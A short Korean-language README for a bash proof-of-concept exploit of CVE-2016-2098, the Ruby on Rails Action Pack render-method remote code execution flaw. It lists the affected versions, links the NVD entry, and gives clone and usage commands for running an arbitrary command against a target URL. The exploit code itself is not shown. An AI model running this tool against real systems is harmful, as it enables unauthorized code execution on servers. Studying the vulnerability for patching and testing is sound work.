
CVE-2016-2098 - bash 기반 Ruby on Rails RCE POC: 부적절한 입력 검증 (CVE-2016-2098). 원격 공격자는 애플리케이션의 render 메서드 무제한 사용을 악용하여 임의의 Ruby 코드를 실행할 수 있습니다.
Ruby on Rails 3.2.22.2 이전 버전, 4.x 4.1.14.2 이전 버전, 4.2.x 4.2.5.2 이전 버전의 Action Pack에서 원격 공격자가 애플리케이션의 제한 없는 render 메서드 사용을 악용하여 임의의 Ruby 코드를 실행할 수 있습니다 (RCE)
https://nvd.nist.gov/vuln/detail/CVE-2016-2098
git clone https://github.com/Debalinax64/CVE-2016-2098.git
cd CVE-2016-2098
/bin/bash ruby-on-rail-RCE.sh < website> <target_uri> < command>
예시: /bin/bash ruby-on-rail-RCE.sh "http://target.com" "pages?id" "pwd"